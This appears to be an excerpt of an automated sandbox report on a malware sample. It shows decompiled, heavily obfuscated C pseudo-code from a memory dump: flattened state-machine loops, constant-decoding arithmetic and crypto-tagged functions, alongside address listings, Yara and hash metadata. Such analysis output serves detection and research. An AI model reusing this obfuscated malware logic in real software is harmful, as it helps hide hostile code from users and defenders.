					_t399 = 0x5c;
					do {
						while(1) {
							L2:
							_t419 = _t380 - 0x21daabfe;
							if(_t419 > 0) {
								break;
							}
							if(_t419 == 0) {
								_t409 =  *0x23ca2c; // 0x4d8300
								_t410 = _t409 + 0x230;
								while(1) {
									__eflags =  *_t410 - _t399;
									if( *_t410 == _t399) {
										break;
									}
									_t410 = _t410 + 2;
									__eflags = _t410;
								}
								_t408 = _t410 + 2;
								_t380 = 0x3af90ff3;
								continue;
							}
							if(_t380 == 0x222340b) {
								E00225FB2(_v1208, _v1128, _t379);
								L27:
								return _v1052;
							}
							if(_t380 == 0x88778bb) {
								_t416 = E002254FE(_v1088, _v1160, _v1192, _v1064, _t380, _t380, _t408, _v1096, _v1200, _v1172, _v1132, _v1148, _v1044, _t380, _v1104, _t408,  &_v1040, _v1188, _t380, _t379, _v1140, _v1156, _t380, _v1180);
								_t417 =  &(_t417[0x16]);
								__eflags = _t416;
								if(_t416 == 0) {
									_t380 = 0x222340b;
								} else {
									_t380 = 0x212fea65;
									_v1052 = 1;
								}
								while(1) {
									L1:
									_t399 = 0x5c;
									goto L2;
								}
							}
							if(_t380 == 0xeb1d0fe) {
								_push(_t380);
								_push(_t380);
								E0022C6C7(_v1196, _v1072,  &_v520, _t380, _v1112, _v1164, _v1168);
								_t417 =  &(_t417[7]);
								_t380 = 0x3304c1c2;
								while(1) {
									L1:
									_t399 = 0x5c;
									goto L2;
								}
							}
							if(_t380 != 0x212fea65) {
								goto L24;
							}
							E002342DA(_t416, _v1204, _v1176, _v1056, _t379, _v1124);
							_t417 =  &(_t417[4]);
							_t380 = 0x2e0be9f8;
							while(1) {
								L1:
								_t399 = 0x5c;
								goto L2;
							}
						}
						__eflags = _t380 - 0x2e0be9f8;
						if(_t380 == 0x2e0be9f8) {
							E00225FB2(_v1060, _v1068, _t416);
							_t380 = 0x222340b;
							_t399 = 0x5c;
							goto L24;
						}
						__eflags = _t380 - 0x3304c1c2;
						if(__eflags == 0) {
							_push(_v1116);
							_t365 = E0023889D(0x23c930, _v1108, __eflags);
							_t367 =  *0x23ca2c; // 0x4d8300
							_t402 =  *0x23ca2c; // 0x4d8300
							E002229E3(_t402, 0x104, _t365, _v1144, _v1212, _v1092, _t367 + 0x230,  &_v1040, _v1184, _v1100);
							E00232025(_v1076, _t365, _v1084, _v1136);
							_t417 =  &(_t417[0xc]);
							_t380 = 0x21daabfe;
							while(1) {
								L1:
								_t399 = 0x5c;
								goto L2;
							}
						}
						__eflags = _t380 - 0x3af90ff3;
						if(_t380 != 0x3af90ff3) {
							goto L24;
						}
						_t379 = E00222959(_t380, _v1120, _v1080, _v1152, _v1048);
						_t417 =  &(_t417[4]);
						__eflags = _t379;
						if(_t379 == 0) {
							goto L27;
						}
						_t380 = 0x88778bb;
						goto L1;
						L24:
						__eflags = _t380 - 0x27fd7905;
					} while (_t380 != 0x27fd7905);
					goto L27;
				}
			}
































































                                              0x0022d7eb
                                              0x0022d7f1
                                              0x0022d7fb
                                              0x0022d800
                                              0x0022d805
                                              0x0022d80a
                                              0x0022d812
                                              0x0022d823
                                              0x0022d827
                                              0x0022d82b
                                              0x0022d830
                                              0x0022d838
                                              0x0022d843
                                              0x0022d84b
                                              0x0022d856
                                              0x0022d85e
                                              0x0022d866
                                              0x0022d86e
                                              0x0022d876
                                              0x0022d87e
                                              0x0022d886
                                              0x0022d88e
                                              0x0022d896
                                              0x0022d89e
                                              0x0022d8a6
                                              0x0022d8ae
                                              0x0022d8b6
                                              0x0022d8bb
                                              0x0022d8c3
                                              0x0022d8cb
                                              0x0022d8d9
                                              0x0022d8dc
                                              0x0022d8e4
                                              0x0022d8e8
                                              0x0022d8f0
                                              0x0022d8f8
                                              0x0022d900
                                              0x0022d905
                                              0x0022d90a
                                              0x0022d912
                                              0x0022d91d
                                              0x0022d928
                                              0x0022d933
                                              0x0022d93b
                                              0x0022d943
                                              0x0022d94b
                                              0x0022d950
                                              0x0022d958
                                              0x0022d963
                                              0x0022d96b
                                              0x0022d976
                                              0x0022d989
                                              0x0022d990
                                              0x0022d99b
                                              0x0022d9a6
                                              0x0022d9b1
                                              0x0022d9bc
                                              0x0022d9c4
                                              0x0022d9cc
                                              0x0022d9d4
                                              0x0022d9dc
                                              0x0022d9e4
                                              0x0022d9e9
                                              0x0022d9f1
                                              0x0022d9fc
                                              0x0022da07
                                              0x0022da12
                                              0x0022da1a
                                              0x0022da22
                                              0x0022da27
                                              0x0022da2f
                                              0x0022da3a
                                              0x0022da42
                                              0x0022da4f
                                              0x0022da57
                                              0x0022da5f
                                              0x0022da64
                                              0x0022da6c
                                              0x0022da74
                                              0x0022da7f
                                              0x0022da86
                                              0x0022da91
                                              0x0022daa6
                                              0x0022daa7
                                              0x0022daae
                                              0x0022dab9
                                              0x0022dac1
                                              0x0022dacb
                                              0x0022dacf
                                              0x0022dad7
                                              0x0022dae4
                                              0x0022daed
                                              0x0022daf1
                                              0x0022daf9
                                              0x0022db04
                                              0x0022db0f
                                              0x0022db1a
                                              0x0022db22
                                              0x0022db2a
                                              0x0022db32
                                              0x0022db3a
                                              0x0022db42
                                              0x0022db4a
                                              0x0022db52
                                              0x0022db5a
                                              0x0022db62
                                              0x0022db6a
                                              0x0022db72
                                              0x0022db80
                                              0x0022db84
                                              0x0022db89
                                              0x0022db8e
                                              0x0022db96
                                              0x0022db9e
                                              0x0022dba6
                                              0x0022dbae
                                              0x0022dbb3
                                              0x0022dbbb
                                              0x0022dbc3
                                              0x0022dbcb
                                              0x0022dbd0
                                              0x0022dbd8
                                              0x0022dbe0
                                              0x0022dbeb
                                              0x0022dbf6
                                              0x0022dc01
                                              0x0022dc09
                                              0x0022dc11
                                              0x0022dc19
                                              0x0022dc24
                                              0x0022dc2f
                                              0x0022dc3a
                                              0x0022dc45
                                              0x0022dc4d
                                              0x0022dc58
                                              0x0022dc65
                                              0x0022dc69
                                              0x0022dc6e
                                              0x0022dc76
                                              0x0022dc7e
                                              0x0022dc86
                                              0x0022dc8b
                                              0x0022dc93
                                              0x0022dc9b
                                              0x0022dcb2
                                              0x0022dcb5
                                              0x0022dcbc
                                              0x0022dcc3
                                              0x0022dcce
                                              0x0022dcde
                                              0x0022dce5
                                              0x0022dce9
                                              0x0022dcf1
                                              0x0022dcf9
                                              0x0022dd01
                                              0x0022dd0d
                                              0x0022dd10
                                              0x0022dd17
                                              0x0022dd1b
                                              0x0022dd20
                                              0x0022dd28
                                              0x0022dd30
                                              0x0022dd38
                                              0x0022dd40
                                              0x0022dd45
                                              0x0022dd4d
                                              0x0022dd55
                                              0x0022dd5d
                                              0x0022dd65
                                              0x0022dd6d
                                              0x0022dd75
                                              0x0022dd75
                                              0x0022dd77
                                              0x0022dd78
                                              0x0022dd78
                                              0x0022dd78
                                              0x0022dd78
                                              0x0022dd7e
                                              0x00000000
                                              0x00000000
                                              0x0022dd84
                                              0x0022de9f
                                              0x0022dea5
                                              0x0022deb0
                                              0x0022deb0
                                              0x0022deb3
                                              0x00000000
                                              0x00000000
                                              0x0022dead
                                              0x0022dead
                                              0x0022dead
                                              0x0022deb5
                                              0x0022deb8
                                              0x00000000
                                              0x0022deb8
                                              0x0022dd90
                                              0x0022dfca
                                              0x0022dfd0
                                              0x0022dfe1
                                              0x0022dfe1
                                              0x0022dd9c
                                              0x0022de77
                                              0x0022de79
                                              0x0022de7c
                                              0x0022de7e
                                              0x0022de95
                                              0x0022de80
                                              0x0022de80
                                              0x0022de85
                                              0x0022de85
                                              0x0022dd75
                                              0x0022dd75
                                              0x0022dd77
                                              0x00000000
                                              0x0022dd77
                                              0x0022dd75
                                              0x0022dda4
                                              0x0022ddd7
                                              0x0022ddd8
                                              0x0022ddfc
                                              0x0022de01
                                              0x0022de04
                                              0x0022dd75
                                              0x0022dd75
                                              0x0022dd77
                                              0x00000000
                                              0x0022dd77
                                              0x0022dd75
                                              0x0022ddac
                                              0x00000000
                                              0x00000000
                                              0x0022ddc8
                                              0x0022ddcd
                                              0x0022ddd0
                                              0x0022dd75
                                              0x0022dd75
                                              0x0022dd77
                                              0x00000000
                                              0x0022dd77
                                              0x0022dd75
                                              0x0022dec2
                                              0x0022dec8
                                              0x0022dfa5
                                              0x0022dfad
                                              0x0022dfb2
                                              0x00000000
                                              0x0022dfb2
                                              0x0022dece
                                              0x0022ded4
                                              0x0022df14
                                              0x0022df21
                                              0x0022df42
                                              0x0022df5c
                                              0x0022df68
                                              0x0022df84
                                              0x0022df89
                                              0x0022df8c
                                              0x0022dd75
                                              0x0022dd75
                                              0x0022dd77
                                              0x00000000
                                              0x0022dd77
                                              0x0022dd75
                                              0x0022ded6
                                              0x0022dedc
                                              0x00000000
                                              0x00000000
                                              0x0022defd
                                              0x0022deff
                                              0x0022df02
                                              0x0022df04
                                              0x00000000
                                              0x00000000
                                              0x0022df0a
                                              0x00000000
                                              0x0022dfb3
                                              0x0022dfb3
                                              0x0022dfb3
                                              0x00000000
                                              0x0022dfbf

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp Download File
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: "%j($#0$']$)$6O$@g$H$Kx$M% $e/!$e/!$x&$yql$,$Gm$m$rj4
                                              • API String ID: 0-131801274
                                              • Opcode ID: adf89437309e037693898407d27ab34d8dc682606898ddaefb12b431068c15b2
                                              • Instruction ID: 82db693e768b045727ca0fe062d070702c690e677d80d3c6408c9c4cdcfe221b
                                              • Opcode Fuzzy Hash: adf89437309e037693898407d27ab34d8dc682606898ddaefb12b431068c15b2
                                              • Instruction Fuzzy Hash: F3021271118381EFE369CF61D54AA5BBBE1FBC5708F10891DE2DA862A0C7B58958CF43
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0022F98C, Relevance: 20.4, Strings: 16, Instructions: 390COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 94%
                                              			E0022F98C(intOrPtr* __edx, char _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v1;
				char _v96;
				char _v108;
				char _v112;
				char _v116;
				intOrPtr _v120;
				char _v124;
				char _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				unsigned int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				intOrPtr _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				intOrPtr _v268;
				void* __ecx;
				void* _t344;
				void* _t374;
				signed int _t377;
				intOrPtr _t391;
				void* _t392;
				intOrPtr _t393;
				signed int _t395;
				intOrPtr _t396;
				signed int _t397;
				intOrPtr* _t401;
				intOrPtr _t403;
				intOrPtr* _t416;
				char* _t448;
				signed int _t450;
				signed int _t451;
				signed int _t452;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				signed int _t456;
				signed int _t457;
				signed int _t458;
				signed int _t459;
				char* _t460;
				void* _t461;
				intOrPtr* _t468;
				void* _t470;
				void* _t472;

				_t401 = _a4;
				_push(_a16);
				_t468 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_t401);
				_push(__edx);
				E0022602B(_t344);
				_v180 = 0x2a54;
				_t470 =  &_v268 + 0x18;
				_v180 = _v180 ^ 0xdbb28899;
				_t403 = 0;
				_t461 = 0x405be48;
				_v268 = 0;
				_t450 = 0x55;
				_v180 = _v180 * 0x34;
				_v180 = _v180 ^ 0xa04911e4;
				_v164 = 0x788;
				_v164 = _v164 * 0x79;
				_v164 = _v164 ^ 0x00038f4a;
				_v260 = 0xdd03;
				_v260 = _v260 ^ 0x82285f25;
				_v260 = _v260 >> 7;
				_v260 = _v260 << 4;
				_v260 = _v260 ^ 0x104552fc;
				_v132 = 0x81fa;
				_v132 = _v132 | 0x4b6553e1;
				_v132 = _v132 ^ 0x4b658f00;
				_v208 = 0xbd69;
				_t451 = 0x73;
				_v208 = _v208 / _t450;
				_v208 = _v208 + 0x56ba;
				_v208 = _v208 ^ 0x000029ec;
				_v156 = 0x625a;
				_v156 = _v156 + 0xffff65b2;
				_v156 = _v156 ^ 0xffffa807;
				_v176 = 0xc378;
				_v176 = _v176 >> 1;
				_v176 = _v176 + 0x1919;
				_v176 = _v176 ^ 0x00004408;
				_v228 = 0xbfad;
				_v228 = _v228 + 0xffff004b;
				_v228 = _v228 / _t451;
				_t452 = 0x16;
				_v228 = _v228 / _t452;
				_v228 = _v228 ^ 0x0019c242;
				_v264 = 0x218a;
				_v264 = _v264 | 0xaefe0d97;
				_v264 = _v264 + 0x77f0;
				_v264 = _v264 + 0xffffbecb;
				_v264 = _v264 ^ 0xaefe1c0e;
				_v152 = 0x1773;
				_v152 = _v152 + 0x7c73;
				_v152 = _v152 ^ 0x000090c4;
				_v140 = 0xfcb3;
				_v140 = _v140 + 0xffff1dd8;
				_v140 = _v140 ^ 0x00004a86;
				_v252 = 0x9e2f;
				_t453 = 9;
				_v252 = _v252 / _t453;
				_v252 = _v252 << 0xc;
				_v252 = _v252 + 0x6e7b;
				_v252 = _v252 ^ 0x01198ad6;
				_v136 = 0x978d;
				_v136 = _v136 << 0xb;
				_v136 = _v136 ^ 0x04bc6438;
				_v144 = 0xf0b5;
				_t454 = 0x79;
				_v144 = _v144 * 0x51;
				_v144 = _v144 ^ 0x004c2c51;
				_v224 = 0xa482;
				_v224 = _v224 ^ 0xc585cea3;
				_v224 = _v224 / _t454;
				_v224 = _v224 ^ 0x01a18743;
				_v148 = 0xd0a0;
				_v148 = _v148 >> 1;
				_v148 = _v148 ^ 0x000025e7;
				_v232 = 0xead1;
				_v232 = _v232 ^ 0xc3cfbc77;
				_v232 = _v232 | 0xf3c428cf;
				_v232 = _v232 + 0xffff938a;
				_v232 = _v232 ^ 0xf3cf35e7;
				_v160 = 0xb488;
				_v160 = _v160 + 0xf6e2;
				_v160 = _v160 ^ 0x0001c37e;
				_v212 = 0xc903;
				_t455 = 0x1e;
				_v212 = _v212 / _t455;
				_v212 = _v212 ^ 0xfd3886ab;
				_v212 = _v212 ^ 0xfd38fa88;
				_v196 = 0xdd05;
				_v196 = _v196 << 5;
				_v196 = _v196 + 0xdc4b;
				_v196 = _v196 ^ 0x001c7bd6;
				_v200 = 0x4db0;
				_v200 = _v200 ^ 0x1a7afaec;
				_v200 = _v200 >> 8;
				_v200 = _v200 ^ 0x001a5e83;
				_v240 = 0x9d3f;
				_v240 = _v240 >> 8;
				_v240 = _v240 << 9;
				_v240 = _v240 + 0x917a;
				_v240 = _v240 ^ 0x0001a611;
				_v256 = 0x4a86;
				_v256 = _v256 >> 0xd;
				_t456 = 0x55;
				_v256 = _v256 * 0x35;
				_v256 = _v256 + 0xffffab30;
				_v256 = _v256 ^ 0xffffb251;
				_v204 = 0x386;
				_v204 = _v204 / _t456;
				_v204 = _v204 ^ 0xc8309f8e;
				_v204 = _v204 ^ 0xc830cb09;
				_v172 = 0x8769;
				_v172 = _v172 >> 0xe;
				_v172 = _v172 ^ 0x00003b2d;
				_v244 = 0x2b5b;
				_v244 = _v244 + 0xb0ca;
				_v244 = _v244 + 0xd805;
				_v244 = _v244 << 2;
				_v244 = _v244 ^ 0x0006bd06;
				_v184 = 0x1527;
				_v184 = _v184 | 0xeeea078d;
				_t457 = 0x28;
				_v184 = _v184 / _t457;
				_v184 = _v184 ^ 0x05f92fca;
				_v192 = 0x11fc;
				_t458 = 0x16;
				_v192 = _v192 / _t458;
				_v192 = _v192 ^ 0x8895e54e;
				_v192 = _v192 ^ 0x8895ebcd;
				_v168 = 0xe011;
				_v168 = _v168 + 0x4c50;
				_v168 = _v168 ^ 0x0001058b;
				_v216 = 0xf07;
				_t459 = 0x32;
				_v216 = _v216 * 0x36;
				_v216 = _v216 >> 2;
				_v216 = _v216 ^ 0x00008949;
				_v248 = 0xde23;
				_v248 = _v248 + 0xecd9;
				_v248 = _v248 << 0xd;
				_v248 = _v248 ^ 0x1d8b17f5;
				_v248 = _v248 ^ 0x24d4a8d4;
				_v220 = 0x3854;
				_v220 = _v220 | 0x09b0f0f7;
				_v220 = _v220 + 0xe63e;
				_v220 = _v220 ^ 0x09b1b8f3;
				_v188 = 0x295e;
				_v188 = _v188 * 0x23;
				_v188 = _v188 / _t459;
				_v188 = _v188 ^ 0x00001cf4;
				_t460 = _v124;
				while(1) {
					L1:
					_t441 = _v236;
					while(1) {
						L2:
						_t472 = _t461 - 0x299f8b6c;
						if(_t472 <= 0) {
							break;
						}
						if(_t461 == 0x2e2d51e6) {
							_v124 = 0x14;
							_t374 = E0022F39F(_v244, _v128, _t460 + 0x60,  &_v124, _v184, _v192, _v164, _t403, _v168);
							_t403 = _v268;
							_t470 = _t470 + 0x1c;
							_t441 = _v236;
							if(_t374 == 0) {
								continue;
							}
							_t461 = 0x8f3e942;
							_t403 = 1;
							_v268 = 1;
							L29:
							if(_t461 == 0x33ec2607) {
								L33:
								return _v268;
							}
							while(1) {
								L1:
								_t441 = _v236;
								goto L2;
							}
						}
						if(_t461 == 0x2e332bc4) {
							E00232674(_v252, _v136, _a4, _t441, _v144, _v224,  *_t468);
							_t470 = _t470 + 0x14;
							_t461 = 0x2452d659;
							L9:
							_t403 = _v268;
							goto L1;
						}
						if(_t461 == 0x2efa85f7) {
							_t377 = _a4 + 1;
							if((_t377 & 0x0000000f) != 0) {
								_t377 = (_t377 & 0xfffffff0) + 0x10;
							}
							 *((intOrPtr*)(_t401 + 4)) = _t377 + 0x74;
							_push(_t403);
							_push(_t403);
							_t460 = E00228736( *((intOrPtr*)(_t401 + 4)));
							 *_t401 = _t460;
							if(_t460 == 0) {
								goto L33;
							} else {
								_t317 = _t460 + 0x74; // 0x74
								_t441 = _t317;
								_v116 = _a4;
								_t461 = 0x332cf2c2;
								_t403 = _v268;
								_v236 = _t317;
								_v120 =  *((intOrPtr*)(_t401 + 4)) - 0x74;
								continue;
							}
						}
						if(_t461 != 0x332cf2c2) {
							goto L29;
						}
						_t396 =  *0x23ca20; // 0x0
						_t397 = E00231B49( &_v128, _v264, _t403,  *((intOrPtr*)(_t396 + 0x2c)), _t403, _v152, _v140);
						_t470 = _t470 + 0x14;
						asm("sbb esi, esi");
						_t461 = ( ~_t397 & 0x0493a058) + 0x299f8b6c;
						goto L9;
					}
					if(_t472 == 0) {
						if(_t403 == 0) {
							E0022F536(_v156, _v176, _v228,  *_t401);
						}
						goto L33;
					}
					if(_t461 == 0x405be48) {
						_t461 = 0x2efa85f7;
						goto L2;
					}
					if(_t461 == 0x8f3e942) {
						_push(_t403);
						_push(_t403);
						E00225F43(_t403, _v128);
						_t461 = 0x299f8b6c;
						goto L9;
					}
					if(_t461 == 0x1e33600c) {
						_v112 = 0x6c;
						_t391 =  *0x23ca20; // 0x0
						_t392 = E00228010( &_v108,  &_v112, _v188, _v240,  *((intOrPtr*)(_t391 + 0x24)),  *((intOrPtr*)(_t391 + 0x10)), _v256, _v204, _v180, _v172);
						_t470 = _t470 + 0x20;
						if(_t392 == 0) {
							_t461 = 0x8f3e942;
							goto L9;
						}
						_t416 =  &_v1;
						_t448 = _t460;
						do {
							 *_t448 =  *_t416;
							_t448 = _t448 + 1;
							_t416 = _t416 - 1;
						} while (_t416 >=  &_v96);
						_t461 = 0x2e2d51e6;
						goto L9;
					}
					if(_t461 != 0x2452d659) {
						goto L29;
					}
					_t393 =  *0x23ca20; // 0x0
					_t395 = E00230A3B(_v120, _v128, _v148, _v232, _v160, _t403,  &_v116, _v212, _v196, _t441, _v200, _t403,  *((intOrPtr*)(_t393 + 0x10)));
					_t470 = _t470 + 0x2c;
					asm("sbb esi, esi");
					_t461 = ( ~_t395 & 0x153f76ca) + 0x8f3e942;
					goto L9;
				}
			}











































































                                              0x0022f993
                                              0x0022f99d
                                              0x0022f9a4
                                              0x0022f9a6
                                              0x0022f9ad
                                              0x0022f9b4
                                              0x0022f9b5
                                              0x0022f9b7
                                              0x0022f9bc
                                              0x0022f9c7
                                              0x0022f9ca
                                              0x0022f9d9
                                              0x0022f9db
                                              0x0022f9e0
                                              0x0022f9e6
                                              0x0022f9e9
                                              0x0022f9ed
                                              0x0022f9f5
                                              0x0022fa02
                                              0x0022fa06
                                              0x0022fa0e
                                              0x0022fa16
                                              0x0022fa1e
                                              0x0022fa23
                                              0x0022fa28
                                              0x0022fa30
                                              0x0022fa3b
                                              0x0022fa46
                                              0x0022fa51
                                              0x0022fa5f
                                              0x0022fa60
                                              0x0022fa66
                                              0x0022fa6e
                                              0x0022fa76
                                              0x0022fa81
                                              0x0022fa8c
                                              0x0022fa97
                                              0x0022fa9f
                                              0x0022faa3
                                              0x0022faab
                                              0x0022fab3
                                              0x0022fabb
                                              0x0022facb
                                              0x0022fad5
                                              0x0022fada
                                              0x0022fade
                                              0x0022fae6
                                              0x0022faee
                                              0x0022faf6
                                              0x0022fafe
                                              0x0022fb06
                                              0x0022fb0e
                                              0x0022fb19
                                              0x0022fb24
                                              0x0022fb2f
                                              0x0022fb3a
                                              0x0022fb45
                                              0x0022fb52
                                              0x0022fb5e
                                              0x0022fb63
                                              0x0022fb69
                                              0x0022fb6e
                                              0x0022fb76
                                              0x0022fb7e
                                              0x0022fb89
                                              0x0022fb91
                                              0x0022fb9c
                                              0x0022fbaf
                                              0x0022fbb2
                                              0x0022fbb9
                                              0x0022fbc4
                                              0x0022fbcc
                                              0x0022fbdc
                                              0x0022fbe0
                                              0x0022fbe8
                                              0x0022fbf3
                                              0x0022fbfa
                                              0x0022fc05
                                              0x0022fc0d
                                              0x0022fc15
                                              0x0022fc1d
                                              0x0022fc25
                                              0x0022fc2d
                                              0x0022fc38
                                              0x0022fc43
                                              0x0022fc4e
                                              0x0022fc5a
                                              0x0022fc5f
                                              0x0022fc65
                                              0x0022fc6d
                                              0x0022fc75
                                              0x0022fc7d
                                              0x0022fc82
                                              0x0022fc8a
                                              0x0022fc92
                                              0x0022fc9a
                                              0x0022fca2
                                              0x0022fca7
                                              0x0022fcaf
                                              0x0022fcb7
                                              0x0022fcbc
                                              0x0022fcc1
                                              0x0022fcc9
                                              0x0022fcd1
                                              0x0022fcd9
                                              0x0022fce3
                                              0x0022fce4
                                              0x0022fce8
                                              0x0022fcf0
                                              0x0022fcf8
                                              0x0022fd06
                                              0x0022fd0a
                                              0x0022fd12
                                              0x0022fd1a
                                              0x0022fd22
                                              0x0022fd27
                                              0x0022fd2f
                                              0x0022fd37
                                              0x0022fd3f
                                              0x0022fd47
                                              0x0022fd4c
                                              0x0022fd54
                                              0x0022fd5c
                                              0x0022fd6c
                                              0x0022fd71
                                              0x0022fd77
                                              0x0022fd7f
                                              0x0022fd8b
                                              0x0022fd90
                                              0x0022fd96
                                              0x0022fd9e
                                              0x0022fda6
                                              0x0022fdae
                                              0x0022fdb6
                                              0x0022fdbe
                                              0x0022fdcb
                                              0x0022fdcc
                                              0x0022fdd0
                                              0x0022fdd5
                                              0x0022fddd
                                              0x0022fde5
                                              0x0022fded
                                              0x0022fdf2
                                              0x0022fdfa
                                              0x0022fe02
                                              0x0022fe0a
                                              0x0022fe12
                                              0x0022fe1a
                                              0x0022fe22
                                              0x0022fe2f
                                              0x0022fe39
                                              0x0022fe3d
                                              0x0022fe45
                                              0x0022fe4c
                                              0x0022fe4c
                                              0x0022fe4c
                                              0x0022fe50
                                              0x0022fe50
                                              0x0022fe50
                                              0x0022fe56
                                              0x00000000
                                              0x00000000
                                              0x0022ff96
                                              0x0023009f
                                              0x002300ca
                                              0x002300cf
                                              0x002300d3
                                              0x002300d6
                                              0x002300dc
                                              0x00000000
                                              0x00000000
                                              0x002300e4
                                              0x002300e9
                                              0x002300ea
                                              0x002300ee
                                              0x002300f4
                                              0x00230117
                                              0x00230125
                                              0x00230125
                                              0x0022fe4c
                                              0x0022fe4c
                                              0x0022fe4c
                                              0x00000000
                                              0x0022fe4c
                                              0x0022fe4c
                                              0x0022ffa2
                                              0x00230082
                                              0x00230087
                                              0x0023008a
                                              0x0022fee7
                                              0x0022fee7
                                              0x00000000
                                              0x0022fee7
                                              0x0022ffae
                                              0x00230001
                                              0x00230004
                                              0x00230009
                                              0x00230009
                                              0x0023000f
                                              0x00230021
                                              0x00230022
                                              0x0023002b
                                              0x0023002d
                                              0x00230033
                                              0x00000000
                                              0x00230039
                                              0x0023003c
                                              0x0023003c
                                              0x00230045
                                              0x0023004c
                                              0x00230051
                                              0x00230055
                                              0x00230059
                                              0x00000000
                                              0x00230059
                                              0x00230033
                                              0x0022ffb6
                                              0x00000000
                                              0x00000000
                                              0x0022ffca
                                              0x0022ffdf
                                              0x0022ffe4
                                              0x0022ffeb
                                              0x0022fff3
                                              0x00000000
                                              0x0022fff3
                                              0x0022fe5c
                                              0x002300fd
                                              0x00230110
                                              0x00230116
                                              0x00000000
                                              0x002300fd
                                              0x0022fe68
                                              0x0022ff86
                                              0x00000000
                                              0x0022ff86
                                              0x0022fe74
                                              0x0022ff73
                                              0x0022ff74
                                              0x0022ff75
                                              0x0022ff7c
                                              0x00000000
                                              0x0022ff7c
                                              0x0022fe80
                                              0x0022fef4
                                              0x0022ff19
                                              0x0022ff2c
                                              0x0022ff31
                                              0x0022ff36
                                              0x0022ff59
                                              0x00000000
                                              0x0022ff59
                                              0x0022ff38
                                              0x0022ff3f
                                              0x0022ff41
                                              0x0022ff43
                                              0x0022ff45
                                              0x0022ff46
                                              0x0022ff4e
                                              0x0022ff52
                                              0x00000000
                                              0x0022ff52
                                              0x0022fe88
                                              0x00000000
                                              0x00000000
                                              0x0022fe8e
                                              0x0022fecd
                                              0x0022fed2
                                              0x0022fed9
                                              0x0022fee1
                                              0x00000000
                                              0x0022fee1

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp Download File
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: -;$>$K$PL$Q,L$Zb$[+$^)$l$s|${n$%$)$Q-.$Q-.$SeK
                                              • API String ID: 0-11970308
                                              • Opcode ID: 69ab67681eb7b7fdcdcbee6933835ac21522f86dfd2a7b25b157d9b27321d0eb
                                              • Instruction ID: 52362f0b4cf311df595d84b7f91e6aad1166f35bb71f31fe8bcb56937b1b24b2
                                              • Opcode Fuzzy Hash: 69ab67681eb7b7fdcdcbee6933835ac21522f86dfd2a7b25b157d9b27321d0eb
                                              • Instruction Fuzzy Hash: B51255725183809FD368CF65C989A4BFBF1BBC4314F108A2DF6D9862A0D7B59919CF42
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00221CFA, Relevance: 18.0, Strings: 14, Instructions: 503COMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 95%
                                              			E00221CFA(void* __edx, intOrPtr* _a4) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				unsigned int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				unsigned int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				void* __ecx;
				void* _t496;
				void* _t539;
				intOrPtr _t544;
				intOrPtr _t546;
				signed int _t548;
				signed int _t551;
				intOrPtr _t552;
				intOrPtr _t554;
				signed int _t555;
				intOrPtr _t562;
				intOrPtr _t572;
				void* _t574;
				signed int _t577;
				signed int _t578;
				signed int _t579;
				signed int _t580;
				signed int _t581;
				signed int _t582;
				signed int _t583;
				signed int _t584;
				signed int _t585;
				signed int _t586;
				signed int _t587;
				signed int _t588;
				signed int _t589;
				signed int _t590;
				intOrPtr _t591;
				intOrPtr _t592;
				void* _t597;
				intOrPtr _t599;
				intOrPtr _t635;
				intOrPtr _t639;
				void* _t641;
				signed int* _t653;
				void* _t656;

				_t575 = _a4;
				_push(_a4);
				_push(__edx);
				E0022602B(_t496);
				_v12 = 0x36bdff;
				_t653 =  &(( &_v228)[3]);
				_v8 = 0x3ff2a1;
				_t639 = 0;
				_v4 = 0;
				_v132 = 0xebdb;
				_t641 = 0x15e50797;
				_t577 = 0x54;
				_v132 = _v132 / _t577;
				_v132 = _v132 | 0x22f60655;
				_v132 = _v132 ^ 0x22f660d1;
				_v120 = 0xef02;
				_v120 = _v120 + 0xffff4354;
				_v120 = _v120 + 0xfbd6;
				_v120 = _v120 ^ 0x0001ae28;
